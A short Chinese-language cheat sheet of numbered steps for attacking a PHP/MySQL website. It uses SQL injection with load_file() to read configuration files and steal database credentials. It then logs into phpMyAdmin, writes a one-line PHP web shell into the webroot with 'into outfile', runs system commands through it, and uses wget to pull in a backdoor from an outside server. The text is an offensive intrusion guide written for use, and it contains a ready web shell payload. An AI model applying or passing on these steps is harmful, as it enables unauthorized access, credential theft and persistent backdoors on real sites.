1.MySQL用户的权限(mysql.user里可以查看),file_priv,可以对系统文件进行读写,当然这个文件要是当前的系统用户有读写权限的。
2.Load_file()函数,读取文件内容
3.Into outfile(导出字符类型的文件,如文本文件)或into dumpfile(可以导出二进制,如执行文件)可以导出数据库内容到文件
4.一句话木马,<?php system($_REQUEST[cmd];)?>可以执行系统命令
5.鼠标放网站链接上,在下面状态栏看到php?id=一般说明与数据库交互
6在显示位上用user()可以显示当前用户,database()显示当前数据库名称,version()数据库版本(@@version),@@basedir(显示数据库安装路径),@@datadir数据库的数据路径
7如果在显示位上用load_file()加载物理路径(因为magic_quotes_gpc可能是打开的转换成十六进制后可以绕过它的限制,所以要转换成十六进制)出来的没有数据库信息的话,那么它包含的文件一般都有数据库连接信息等,再用load_file()加载包含的文件(依旧转换成十六进制)
8MySQL除了企业版是不可以远程连接的,一般都有phpmyadmin,一般在网站URL后面加上phpmyadmin
9利用load_file()加载出包含文件里的用户名密码登录phpmyadmin ,创建新的数据库,表,字段,然后再在该数据库中执行语句select * from beach into outfile ‘网站的绝对路径/导出文件的文件名(自己随便创建创建)’
10.访问网站的绝对路径/导出的文件名.php?看是否导出成功
访问网站的绝对路径/导出的文件名.php?创建的字段=ls 列出路径下的所有文件
11用wget这个软件下载脚本后门:网站的绝对路径/导出的文件名.php?创建的字段=wget+下载的地址
12.下载完成后用网站的绝对路径/导出的文件名.php?创建的字段=ls 列出路径下的所有文件看是否下载成功。
13.用网站的绝对路径/导出的文件名.php?创建的字段=mv+原文件名+新文件名
14.访问网站的绝对路径/新文件名登录脚本后门即可(可用网站的绝对路径/导出的文件名.php?创建的字段=cat ./新创建的文件名查看脚本后门的密码)